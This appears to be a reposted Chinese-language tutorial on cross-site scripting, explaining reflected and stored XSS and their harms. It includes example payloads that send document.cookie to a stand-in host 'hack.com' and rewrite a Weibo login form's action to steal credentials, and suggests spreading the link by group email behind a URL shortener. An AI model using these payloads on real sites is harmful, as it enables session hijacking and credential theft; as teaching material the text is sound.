XSS 叫跨站腳本攻擊（Cross Site Script），那么XSS原本應(yīng)該叫做CSS，但是由于CSS的簡(jiǎn)稱已經(jīng)被連級(jí)樣式表 使用了，所以就換個(gè)稱謂XSS。?

為什么叫做跨站腳本攻擊呢？
它的意思就是在別人的網(wǎng)站上嵌入腳本，而這個(gè)腳本原本不是屬于這個(gè)網(wǎng)站的。這個(gè)解釋很直觀吧。


怎么嵌入腳本呢？

比如這么個(gè)搜索結(jié)果頁(yè)，當(dāng)用戶搜索test的時(shí)候，頁(yè)面會(huì)顯示“搜索關(guān)鍵詞：test”

這個(gè)時(shí)候，這里的test就很有可能會(huì)出現(xiàn)xss漏洞，如果該頁(yè)面是直接將用戶輸入的東西“返回”到頁(yè)面上，那么存在的xss漏洞就可以這樣利用：

輸入：<script>alert(1);</scrip>
那么頁(yè)面就會(huì)跳出alert(1);
這種XSS叫做反射性XSS。


再談?wù)摿硗庖环N場(chǎng)景，每個(gè)網(wǎng)站都有反饋框。允許用戶反饋數(shù)據(jù)給后臺(tái)。

而這個(gè)后臺(tái)一般都是管理員進(jìn)行審核，會(huì)在管理后臺(tái)展示。

如果一個(gè)<script>var x=new Image(); x.src=” http://hack.com?cookie= ”+document.cookie;</script>的反饋數(shù)據(jù)由用戶輸入

然后這個(gè)數(shù)據(jù)“直接”返回到管理后臺(tái)上，那么這個(gè)時(shí)候，管理后臺(tái)管理員的cookie就被作為參數(shù)傳遞到 http://hack.com ?了。后面 黑客 就可以使用cookie來(lái)做登錄管理后臺(tái)了。

這種XSS由于攻擊代碼存儲(chǔ)進(jìn)數(shù)據(jù)庫(kù)了，所以叫做存儲(chǔ)型XSS。



危害
一般來(lái)說(shuō)，存儲(chǔ)型XSS的危害性大于反射型XSS。因?yàn)榉瓷湫蚗SS只會(huì)影響到自己，而存儲(chǔ)型的XSS可能會(huì)影響到網(wǎng)站的其他用戶。


XSS可以如上面例子說(shuō)的：

1 盜取cookie

2 釣魚
比如我將一段代碼注入進(jìn)某個(gè)網(wǎng)站的支付頁(yè)面，這段js代碼做的事情是，動(dòng)態(tài)控制這個(gè)支付頁(yè)面的Form表單，比如將這個(gè)form表單的html替換成目標(biāo)網(wǎng)站一個(gè)相似的html。

或者另一個(gè)案例是使用反射型XSS，我預(yù)先生成一個(gè)url，這個(gè)url是一個(gè)有反射型xss 漏洞 的頁(yè)面。比如

      document.getElementById("loginForm").action="http://hack.com"http://weibo.com/login?username=<script>document.getElementById("loginForm").action="http://hack.com"</script>
    

?

然后我將這個(gè)頁(yè)面通過(guò)企鵝的群郵件發(fā)給企鵝群中的所有人，一旦有人點(diǎn)擊這個(gè)鏈接，那么就會(huì)進(jìn)入微博登陸頁(yè)，萬(wàn)一再輸入用戶名密碼，那么這個(gè)人的用戶名密碼就會(huì)被盜了。當(dāng)然，這個(gè)案例有個(gè)問(wèn)題，url太假了，怎么辦？短鏈接服務(wù)。現(xiàn)在有很多廠商提供了短連接的服務(wù)。那么最后的鏈接是實(shí)際看不出來(lái)問(wèn)題的。

3 DDOS攻擊
當(dāng)然這個(gè)前提是有大量用戶已經(jīng)被XSS攻擊了，所以他們?yōu)g覽的頁(yè)面已經(jīng)被植入了代碼，這個(gè)代碼的作用就是循環(huán)向一個(gè)網(wǎng)站發(fā)送請(qǐng)求，如果有xss漏洞的這個(gè)網(wǎng)站是有大量用戶的，比如微博，那么后一個(gè)被DDOS攻擊的網(wǎng)站就真心慘了。

總之，XSS的危害就在于網(wǎng)站的頁(yè)面可以被隨意嵌入js代碼。

轉(zhuǎn)自 : http://anquan.baidu.com/bbs/thread-130626-1-1.html